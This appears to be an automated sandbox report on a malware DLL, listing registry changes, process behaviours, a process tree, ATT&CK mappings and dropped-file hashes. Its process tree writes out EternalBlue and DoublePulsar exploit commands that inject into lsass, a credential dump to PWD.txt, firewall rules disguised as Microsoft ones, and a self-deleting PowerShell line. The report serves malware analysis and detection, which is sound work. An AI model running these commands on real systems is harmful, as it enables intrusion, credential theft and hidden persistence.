Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-581 = "North Asia East Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-132 = "US Eastern Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@%SystemRoot%\system32\dhcpqec.dll,-103 = "1.0"	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-151 = "Central America Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-722 = "Central Pacific Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-742 = "New Zealand Standard Time"	Meson.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-411 = "E. Africa Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-361 = "GTB Daylight Time"	Meson.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-451 = "Caucasus Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-271 = "Greenwich Daylight Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-582 = "North Asia East Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time"	Meson.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\36-6a-e1-53-ba-26\WpadDecisionTime = 402443526050db01	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-662 = "Cen. Australia Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-342 = "Egypt Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-691 = "Tasmania Daylight Time"	Meson.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-292 = "Central European Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-412 = "E. Africa Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CF9F3DDE-C07F-47BC-BBBB-D97087495001}\WpadNetworkName = "Network 3"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time"	Meson.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-242 = "Samoa Standard Time"	Meson.exe

Suspicious behavior: EnumeratesProcesses 32 IoCs

pid	Process
2596	MpMgSvc.exe
2596	MpMgSvc.exe
2596	MpMgSvc.exe
2596	MpMgSvc.exe
2596	MpMgSvc.exe
2596	MpMgSvc.exe
2596	MpMgSvc.exe
2596	MpMgSvc.exe
2596	MpMgSvc.exe
3204	GetPassword.exe
3204	GetPassword.exe
3204	GetPassword.exe
3204	GetPassword.exe
3348	powershell.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe
1560	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
2788	svchost.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3204	GetPassword.exe
Token: SeDebugPrivilege	3348	powershell.exe
Token: SeDebugPrivilege	4476	traffmonetizer.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
4476	traffmonetizer.exe

Suspicious use of SetWindowsHookEx 4 IoCs

pid	Process
2596	MpMgSvc.exe
2596	MpMgSvc.exe
1692	Wmicc.exe
3276	Hooks.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3068 wrote to memory of 2244	3068	rundll32.exe	30
PID 3068 wrote to memory of 2244	3068	rundll32.exe	30
PID 3068 wrote to memory of 2244	3068	rundll32.exe	30
PID 3068 wrote to memory of 2244	3068	rundll32.exe	30
PID 3068 wrote to memory of 2244	3068	rundll32.exe	30
PID 3068 wrote to memory of 2244	3068	rundll32.exe	30
PID 3068 wrote to memory of 2244	3068	rundll32.exe	30
PID 2244 wrote to memory of 2668	2244	rundll32.exe	31
PID 2244 wrote to memory of 2668	2244	rundll32.exe	31
PID 2244 wrote to memory of 2668	2244	rundll32.exe	31
PID 2244 wrote to memory of 2668	2244	rundll32.exe	31
PID 2244 wrote to memory of 2668	2244	rundll32.exe	31
PID 2244 wrote to memory of 2668	2244	rundll32.exe	31
PID 2244 wrote to memory of 2668	2244	rundll32.exe	31
PID 2244 wrote to memory of 2668	2244	rundll32.exe	31
PID 2244 wrote to memory of 2668	2244	rundll32.exe	31
PID 2668 wrote to memory of 2596	2668	svchost.exe	33
PID 2668 wrote to memory of 2596	2668	svchost.exe	33
PID 2668 wrote to memory of 2596	2668	svchost.exe	33
PID 2668 wrote to memory of 2596	2668	svchost.exe	33
PID 2596 wrote to memory of 3804	2596	MpMgSvc.exe	34
PID 2596 wrote to memory of 3804	2596	MpMgSvc.exe	34
PID 2596 wrote to memory of 3804	2596	MpMgSvc.exe	34
PID 2596 wrote to memory of 3804	2596	MpMgSvc.exe	34
PID 2596 wrote to memory of 2244	2596	MpMgSvc.exe	36
PID 2596 wrote to memory of 2244	2596	MpMgSvc.exe	36
PID 2596 wrote to memory of 2244	2596	MpMgSvc.exe	36
PID 2596 wrote to memory of 2244	2596	MpMgSvc.exe	36
PID 2596 wrote to memory of 1692	2596	MpMgSvc.exe	38
PID 2596 wrote to memory of 1692	2596	MpMgSvc.exe	38
PID 2596 wrote to memory of 1692	2596	MpMgSvc.exe	38
PID 2596 wrote to memory of 1692	2596	MpMgSvc.exe	38
PID 1692 wrote to memory of 3720	1692	Wmicc.exe	39
PID 1692 wrote to memory of 3720	1692	Wmicc.exe	39
PID 1692 wrote to memory of 3720	1692	Wmicc.exe	39
PID 1692 wrote to memory of 3720	1692	Wmicc.exe	39
PID 3720 wrote to memory of 3204	3720	cmd.exe	41
PID 3720 wrote to memory of 3204	3720	cmd.exe	41
PID 3720 wrote to memory of 3204	3720	cmd.exe	41
PID 3720 wrote to memory of 3204	3720	cmd.exe	41
PID 2668 wrote to memory of 3276	2668	svchost.exe	43
PID 2668 wrote to memory of 3276	2668	svchost.exe	43
PID 2668 wrote to memory of 3276	2668	svchost.exe	43
PID 2668 wrote to memory of 3276	2668	svchost.exe	43
PID 3276 wrote to memory of 3348	3276	Hooks.exe	45
PID 3276 wrote to memory of 3348	3276	Hooks.exe	45
PID 3276 wrote to memory of 3348	3276	Hooks.exe	45
PID 3276 wrote to memory of 3348	3276	Hooks.exe	45
PID 1560 wrote to memory of 2788	1560	svchost.exe	47
PID 1560 wrote to memory of 2788	1560	svchost.exe	47
PID 1560 wrote to memory of 2788	1560	svchost.exe	47
PID 1560 wrote to memory of 2788	1560	svchost.exe	47
PID 1560 wrote to memory of 2788	1560	svchost.exe	47
PID 1560 wrote to memory of 2788	1560	svchost.exe	47
PID 1560 wrote to memory of 2788	1560	svchost.exe	47
PID 1560 wrote to memory of 2788	1560	svchost.exe	47
PID 1560 wrote to memory of 2788	1560	svchost.exe	47
PID 1560 wrote to memory of 3420	1560	svchost.exe	48
PID 1560 wrote to memory of 3420	1560	svchost.exe	48
PID 1560 wrote to memory of 3420	1560	svchost.exe	48
PID 1560 wrote to memory of 3420	1560	svchost.exe	48
PID 1560 wrote to memory of 2436	1560	svchost.exe	50
PID 1560 wrote to memory of 2436	1560	svchost.exe	50
PID 1560 wrote to memory of 2436	1560	svchost.exe	50

C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\4492433d53cefa40630f1e69e4d9faec8a3c6e053d5238f4dbf15c80f6174b3a.dll,#1
1⤵
- Suspicious use of WriteProcessMemory
PID:3068
- C:\Windows\SysWOW64\rundll32.exe
  rundll32.exe C:\Users\Admin\AppData\Local\Temp\4492433d53cefa40630f1e69e4d9faec8a3c6e053d5238f4dbf15c80f6174b3a.dll,#1
  2⤵
  - Suspicious use of SetThreadContext
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2244
- - C:\Windows\SysWOW64\svchost.exe
    "C:\Windows\system32\svchost.exe"
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2668
  - - C:\WINDOWS\Temp\MpMgSvc.exe
      "C:\WINDOWS\Temp\MpMgSvc.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:2596
    - - C:\WINDOWS\Temp\Eternalblue-2.2.0.exe
        
        Eternalblue-2.2.0.exe --TargetIp 10.127.1.4 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3804
    - - C:\WINDOWS\Temp\Eternalblue-2.2.0.exe
        
        Eternalblue-2.2.0.exe --TargetIp 10.127.1.4 --Target WIN72K8R2 --TargetPort 445 --VerifyTarget True --VerifyBackdoor True --MaxExploitAttempts 3 --GroomAllocations 12 --OutConfig LOG.txt
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:2244
    - - C:\Windows\Temp\Wmicc.exe
        
        "C:\Windows\Temp\Wmicc.exe"
        5⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:1692
      - C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /c C:\Windows\Temp\GetPassword.exe >C:\Windows\Temp\PWD.txt
        6⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3720
        
        C:\Windows\Temp\GetPassword.exe
        
        C:\Windows\Temp\GetPassword.exe
        7⤵
        Executes dropped EXE
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3204
    - - C:\WINDOWS\Temp\Doublepulsar-1.3.1.exe
        
        Doublepulsar-1.3.1.exe --OutConfig LOG.txt --TargetIp 10.127.1.4 --TargetPort 445 --DllPayload x64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:3360
    - - C:\WINDOWS\Temp\Doublepulsar-1.3.1.exe
        
        Doublepulsar-1.3.1.exe --OutConfig LOG.txt --TargetIp 10.127.1.4 --TargetPort 445 --DllPayload x64.dll --DllOrdinal 1 ProcessName lsass.exe --ProcessCommandLine --Protocol SMB --Architecture x64 --Function Rundll
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:4792
  - - C:\WINDOWS\Temp\Hooks.exe
      "C:\WINDOWS\Temp\Hooks.exe"
      4⤵
      Server Software Component: Terminal Services DLL
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:3276
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Start-Sleep -s 2;del "C:\WINDOWS\Temp\Hooks.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3348

C:\Windows\SysWOW64\svchost.exe
C:\Windows\SysWOW64\svchost.exe -k GraphicsPerfSvcsGroup
1⤵
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1560
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\system32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: GetForegroundWindowSpam
  PID:2788
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_ctfmoon dir=in program=C:\Windows\Microsoft.NET\ctfmoon.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:3420
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_ctfmoon dir=out program=C:\Windows\Microsoft.NET\ctfmoon.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2436
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall set rule name=Microsoft_ctfmoon new enable=yes
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2860
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_Edge dir=in program=C:\Windows\Microsoft.NET\Meson.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:2408
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_Edge dir=out program=C:\Windows\Microsoft.NET\Meson.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:1564
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall set rule name=Microsoft_Edge new enable=yes
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:644
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_Dcom dir=in program=C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:3136
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_Dcom dir=out program=C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:2480
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall set rule name=Microsoft_Dcom new enable=yes
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:2116
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_Store dir=in program=C:\WINDOWS\Microsoft.Net\Framework\v3.0\WmiPrvSER.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:684
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall add rule name=Microsoft_Store dir=out program=C:\WINDOWS\Microsoft.Net\Framework\v3.0\WmiPrvSER.exe action=allow
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2176
- C:\Windows\SysWOW64\netsh.exe
  netsh advfirewall firewall set rule name=Microsoft_Store new enable=yes
  2⤵
  - Modifies Windows Firewall
  - Event Triggered Execution: Netsh Helper DLL
  - System Location Discovery: System Language Discovery
  PID:2832
- C:\Windows\Microsoft.NET\ctfmoon.exe
  C:\Windows\Microsoft.NET\ctfmoon.exe [email protected] -password=123456Aa. -device-name=Win32 -accept-tos
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  PID:1052
- C:\Windows\Microsoft.NET\Meson.exe
  C:\Windows\Microsoft.NET\Meson.exe
  2⤵
  - Executes dropped EXE
  - System Location Discovery: System Language Discovery
  - Modifies data under HKEY_USERS
  PID:3324
- C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe
  C:\Windows\Microsoft.NET\traffmonetizer\traffmonetizer.exe
  2⤵
  - Executes dropped EXE
  - Drops file in System32 directory
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4476

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Defense Evasion

Impair Defenses

T1562

Disable or Modify System Firewall

T1562.004

Credential Access

Discovery

Network Service Discovery

T1046

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\Microsoft.NET\root_conf\default.toml

Filesize
390B

MD5
9e3d810a244768218af8fc0499bd5dd7

SHA1
660cb236baf95c83e0acd64e3f607fbeb199a1e0

SHA256
e864d44ec86eaa38112c3bfcfc21b078cc59e11f984c0441989e8606197357e2

SHA512
8f9ac0dede89a68202eb858cda086727ebbba3fdfb4fa43ce2d52cdd5e69c89f66a171fae371ca29b4d65dc04862cbcb71e58be48e8dcc520e1db3b27a093f2b

Download Submit
C:\Windows\Temp\Eternalblue-2.2.0.xml

Filesize
7KB

MD5
497080fed2000e8b49ee2e97e54036b1

SHA1
4af3fae881a80355dd09df6e736203c30c4faac5

SHA256
756f44f1d667132b043bfd3da16b91c9f6681e5d778c5f07bb031d62ff00d380

SHA512
4f8bd09f9d8d332c436beb8164eec90b0e260b69230f102565298beff0db37265be1ae5eb70acf60e77d5589c61c7ee7f01a02d2a30ac72d794a04efef6f25df

Download Submit
C:\Windows\Temp\Hooks.exe

Filesize
11.7MB

MD5
1af2da7b95cdbbd5a18461e5d5fe910a

SHA1
8540958b02170962cb958da094e059be5ff43fb0

SHA256
1b08b6f863be2c62eb5b00457475630fddb245361f1a35e4396eada29e2da64a

SHA512
bc3ea6b76cc8079871c550af197d01c227526688881b10a5192a215d9dca8cd8401408d6a6835444cab862b20856b1ad88b1450a3f93dfa8cd2ecbdc5653459a

Download Submit
C:\Windows\Temp\MpMgSvc.exe

Filesize
3.2MB

MD5
3809c59565787ee7398fe9222d4bd669

SHA1
68842768c9ae9deb1d1d7ed2b27846c392b47103

SHA256
c751d97251cd67604c0256b779fabac87d4ed2d647ce0d830e2a1670cd3616c6

SHA512
2f78ad26acfe15f4682b69090704fa8ebb24938c8a58b8d343ef0993e8234897aed53dfcea4119168f915384fe545d2cbb16bc12339d0600dafae06deefc9098

Download Submit
C:\Windows\Temp\PWD.txt

Filesize
29B

MD5
6b946dede4b6cd8262e46139038059f5

SHA1
dcf067ac96c8e845832c52b7a9bf13519f497148

SHA256
92e40d676342036a860149b9a0eac5985a581ea70e7c8165fa0093f032a3cc0e

SHA512
727597f13c8913c97cf5eecb03d1ec3d24ae0abf3e7454f7a1045d03923bbe9aab5d5f52a81454d91c594e4b74f3d683510749b6791fab2624747bcc0be76fc1

Download Submit
C:\Windows\Temp\ip.txt

Filesize
180KB

MD5
38e6af7ff8cc3ec3f4d3db24e595dd52

SHA1
9c43bf89ed53006735cca6c54f7945360fcc1eea

SHA256
f8ed5af375e0eb54e9877978ee5aeb55c48c6a33a73d1f175a39322a4159ec0f

SHA512
92d4bfbefcda5478e88d4eabd17aa26268d62c46a008dc2ddcc383505e5d5273ba9ab6182bf903044a2d21952a44b2d643cc67d12851c5026b85f94b79757c87

Download Submit
C:\Windows\Temp\ip.txt

Filesize
2KB

MD5
295c98e06e9cea02d50ae85e7d501ab1

SHA1
8dbfc9e74b4d60dd68eabe18e3258415505088f9

SHA256
09948833e229b2d74dbf67145ff89fc91404fa3124fb749ae9a191f451119852

SHA512
5c0639b4712f10ffb794c6f93037ce31c1feb27c4a7dee5aaeab909150e314bc95add17df1d4daa06f84727486780cfcfbf00647d72d995859cf42aa3209a233

Download Submit
C:\Windows\Temp\ip.txt

Filesize
2KB

MD5
468e57beb9abe9976041edd30d86997b

SHA1
bb6344570885897a11ca7adc1c7cc03a8411fe88

SHA256
f389c7b3de32ba6f7cc7f6f97a186847270c453795745addefa7074d94facb81

SHA512
ecf3cee6e78c9dc8ea6c61587d48c3314158ce9f14be6a15b015bd758eea24cf30fc0a021e8b54b773e7d45084f6c45d01ad8f1db3c6af9b47ae44aef224b5de

Download Submit
C:\Windows\Temp\ip.txt

Filesize
3KB

MD5
6fea1034e6b6f8445555db9cfd158f3a

SHA1
6c74e4c3a5e19acb1adf87db7f455cd8af29d784

SHA256
d84363bab07196af021b0428dc22edc0898f3219ae6730a4ad3a56365bf4d9f8

SHA512
762074588981d8b52afbc740c1f03103f424da4cd2090c0f56af233f87dfbded1266a7435e9869cdcf7eea1487a8d86100a86fb3fe239f67f5a3b7cea85bc6a4

Download Submit
C:\Windows\Temp\ip.txt

Filesize
3KB

MD5
00796a21f50c104a2fa5f47be30a61e8

SHA1
a50747f8b648d40eff1a3f050b6860b943af283f

SHA256
fde6b3e24813e7b3b8ba78ad631f29d66fa2c464a371254619d500c12d7fd222

SHA512
844fcbb169cebbefe91dc26886b94d9d15656e7ef3a80b47fc17acd9888b84db4d6f6b8e9a7f42c49eb7f782f277baaa5194ba8d81ec46ece49176289331a193

Download Submit
C:\Windows\Temp\ip.txt

Filesize
4KB

MD5
3890505a3a06ed6333f395f2be50b317

SHA1
c241f843b03dfdb3edbe9e3723e0abe49fa26f8b

SHA256
7fffb91bdda7ae22a88db81f5c6603e1364b9dbac67b886451caa8ac9669c911

SHA512
6aa7e1415fb2e7a6b57a4b004b5078d1df4c669be81569bbfa31bd617dba7e836c4e9e0e6a2377beaee9118023b8f9394c399dc0184293a0a288b39c65abae01

Download Submit
\??\c:\users\admin\appdata\roaming\graphicsperfsvcs.dll

Filesize
23.7MB

MD5
effda8dc24b5465dd1424177160a5f1a

SHA1
9c3267d98ec841d4debda61d7c6aa158e6750996

SHA256
2bfbf9d0ed537106096a2dbfdb4bc1bbc1818c8d5befbad46fe872dfb2e5ee0b

SHA512
98e4155193e06baaec900d423eee3069809dbe5d26d401ce4508b79e4874b9014c3d6a8f36416074a369e17b089cd081820c01dc6cdd6743ece01e2ac182ac79

Download Submit
\Windows\Microsoft.NET\Meson.exe

Filesize
8.9MB

MD5
87c8b215c031443d630da6c18088f89a

SHA1
7a17a9026ec093c4571c13c2fc128b27fbd66a11

SHA256
0caedcf61c3bfe2da33b30adf2f5f2c1530b6907f133f4289519a56cc5c1bae6

SHA512
48d5565f5da60371b79d2c380a63c7b416a220ae7f52656ba4ed9447cf55ab73a05c4165c61c2a95c4e586b2baf483b0b97dcff77c76cadfe039690ded35c43e

Download Submit
\Windows\Microsoft.NET\ctfmoon.exe

Filesize
9.1MB

MD5
1de26ef85f7218e1df4ed675fa2b05d4

SHA1
e5217fa3b50f625d84d5e5c4b66c031f7a2446ae

SHA256
fdd762192d351cea051c0170840f1d8d171f334f06313a17eba97cacb5f1e6e1

SHA512
ada80a9f97bec76899eccc40c646387a067a201663d4d0f4537af450ea7c92df877f017862634e32e9e2ba08ca6d41806dc03f0dfd7f811ca303b56b1ac17d92

Download Submit
\Windows\Temp\Doublepulsar-1.3.1.exe

Filesize
44KB

MD5
c24315b0585b852110977dacafe6c8c1

SHA1
be855cd1bfc1e1446a3390c693f29e2a3007c04e

SHA256
15ffbb8d382cd2ff7b0bd4c87a7c0bffd1541c2fe86865af445123bc0b770d13

SHA512
81032d741767e868ec9d01e827b1c974b7c040ff832907d0a2c4bdc08301189b1de3338225587eddf81a829103392f454ba9d9685330b5f6706ea2977a6418e2

Download Submit
\Windows\Temp\Eternalblue-2.2.0.exe

Filesize
126KB

MD5
8c80dd97c37525927c1e549cb59bcbf3

SHA1
4e80fa7d98c8e87facecdef0fc7de0d957d809e1

SHA256
85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5

SHA512
50e9a3b950bbd56ff9654f9c2758721b181e7891384fb37e4836cf78422399a07e6b0bfab16350e35eb2a13c4d07b5ce8d4192fd864fb9aaa9602c7978d2d35e

Download Submit
\Windows\Temp\GetPassword.exe

Filesize
494KB

MD5
5b6a804db0c5733d331eb126048ca73b

SHA1
f18c5acae63457ad26565d663467fa5a7fbfbee4

SHA256
5bec6b3bc6f8cbda50a8c5195a488cc82d2e00f18ec75640db31b2376a6db9f9

SHA512
ba6424051ab9f650967cc2ba428fd6a02ccda8f99d8b8e3f5f321a5e6bbf79a22bfc9cdd582c44980470ebbb7aea1b811fd69aab6bf51466a803c7c722fcde26

Download Submit
\Windows\Temp\Wmicc.exe

Filesize
1.4MB

MD5
4935b75f2a23d38527cf3821c9d9dac3

SHA1
f17aa56215ab7b90da00f048fe30d39a2d671b5d

SHA256
dd2d7b07e9091590ae60b42022956319bbbbd51b457ea214fb475ecc3e9156f8

SHA512
348e041104de20b0850b19db1ebb88ae0b65ecd1695f1ade47e099d62da9cec983a1a73e7fc657509b4fc58496784e0c1681bf46265477b75fdfab440c41acbd

Download Submit
\Windows\Temp\coli-0.dll

Filesize
15KB

MD5
3c2fe2dbdf09cfa869344fdb53307cb2

SHA1
b67a8475e6076a24066b7cb6b36d307244bb741f

SHA256
0439628816cabe113315751e7113a9e9f720d7e499ffdd78acbac1ed8ba35887

SHA512
d6b819643108446b1739cbcb8d5c87e05875d7c1989d03975575c7d808f715ddcce94480860828210970cec8b775c14ee955f99bd6e16f9a32b1d5dafd82dc8c

Download Submit
\Windows\Temp\exma-1.dll

Filesize
10KB

MD5
ba629216db6cf7c0c720054b0c9a13f3

SHA1
37bb800b2bb812d4430e2510f14b5b717099abaa

SHA256
15292172a83f2e7f07114693ab92753ed32311dfba7d54fe36cc7229136874d9

SHA512
c4f116701798f210d347726680419fd85880a8dc12bf78075be6b655f056a17e0a940b28bbc9a5a78fac99e3bb99003240948ed878d75b848854d1f9e5768ec9

